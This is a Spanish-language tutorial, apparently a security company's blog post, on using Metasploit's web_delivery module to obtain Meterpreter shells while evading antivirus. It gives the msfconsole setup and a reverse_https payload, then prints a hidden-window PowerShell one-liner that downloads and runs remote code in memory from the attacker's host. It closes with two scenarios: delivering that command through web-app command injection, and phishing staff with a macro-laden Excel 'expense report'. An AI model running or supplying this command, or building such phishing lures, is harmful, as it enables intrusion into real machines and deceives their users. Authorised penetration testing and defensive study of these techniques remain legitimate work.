Modulo web delivery de Metasploit para evasión de antivirus

En este artículo vamos a echar un vistazo a un módulo de explotación de Metasploit que no recibe mucha atención. Este módulo se llama web_delivery y el módulo dispara rápidamente un servidor web que sirve payloads. El objetivo principal de este módulo es establecer rápidamente una sesión en un equipo de destino cuando el atacante tiene que escribir manualmente en el comando de sí mismo explica Jon Bush, experto de pruebas de penetración. Acuerdo con profesionales de empresa de seguridad informática, este vector de ataque no escribe en el disco por lo que es menos probable que antivirus detecta la actividad y permitirá escaladas de privilegios suministrados por Meterpreter.

Para empezar, arranca msfconsole y seleccionar el módulo web_delivery con el siguiente comando:

use exploit/multi/script/web_delivery

El comando "info" nos dará una visión general de las opciones y el uso del módulo previsto. Como se puede ver este módulo servirá payload a través de HTTP y espera por una conexión desde el blanco, por eso se llama "web_delivery". La computadora de victima debe conectar con su servidor web para que esto funcione explica experto de pruebas de penetración.

Podemos ver que hay tres opciones disponibles:

Python

PHP

PSH (PowerShell)

Estas tres opciones proporcionan una cobertura bastante sólido para la mayoría de las situaciones que es probable que encuentre. Python se ha incluido con Linux y OSX desde hace varios años, PSH se incluye con todas las versiones de Windows y PHP cubrirá al menos algunas de sus necesidades de servidor web.

Según profesionales de empresa de seguridad informática, lo primero que debe hacer es dirigirse a las opciones "SRVHOST" y "SRVPORT". Puede dejar "SRVHOST" con el valor por defecto, pero cambia "SRVPORT" a "80", ya que la mayoría de los sistemas usan ese puerto. Como he mencionado antes Jon Bush, experto de pruebas de penetración, este es un módulo de exploit para que usted consiga shell y para eso tendrá que especificar las opciones de payload también. Utilice el comando estándar para establecer payload dependiendo de su blanco. Vamos a suponer que es PSH. set PAYLOAD windows/meterpreter/reverse_https

Por último, establecer opciones "LHOST" y " LPORT " de payload como necesario.

Algo a destacar es que este módulo se ejecuta automáticamente como un servicio en segundo plano, lo que significa que el controlador se ejecuta de forma indefinida, por lo que no tiene que preocuparse por problemas de tiempo de espera en sistemas lentos, y se puede seguir utilizando frameworks para tareas adicionales mientras que espere por shell. Una vez que esté listo, puede iniciarlo con:

exploit

y usted debe obtener un comando similar al siguiente:

powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://<LHOST>/b9Ezsssdf'))

Ahora, ¿cómo se pone eso a utilizar depende de su escenario y pueden probar eso durante auditoría de pruebas de penetración. Escenario 1: Inyección de comandos Así que usted tiene una vulnerabilidad de inyección de comandos en una aplicación web. Usted ya ha determinado que el servidor se ejecuta en Windows. Obviamente, usted debe crear un ejecutable de Meterpreter o puerta trasera de un exe conocido, alojar a través de HTTP o FTP, y luego aprovechar la inyección de comandos para "echo" de su script línea por línea, para bajar y ejecutar el ejecutable. O bien, puede aprovechar la inyección de comandos para ejecutar un solo comando que inicia PowerShell, descargas y ejecuta script completamente en la memoria para que el Antivirus no lo detecte, y usted tendrá su shell.

Escenario 2: Phishing Digamos que usted va hacer phishing, y para eso puede tomar un documento de Excel, pone algunos números en ella, y lo llama un informe de gastos. Crear script de VBA para ejecutar el módulo y pegarlo en una macro. Enviar este documento en correos a las personas de diferentes departamentos para que usted obtenga al menos un shell.

Este artículo se centró en el objetivo de PSH, cosas similares son posibles con los objetivos de Python y PHP explican expertos de webimprints, un proveedor y empresa de seguridad informática.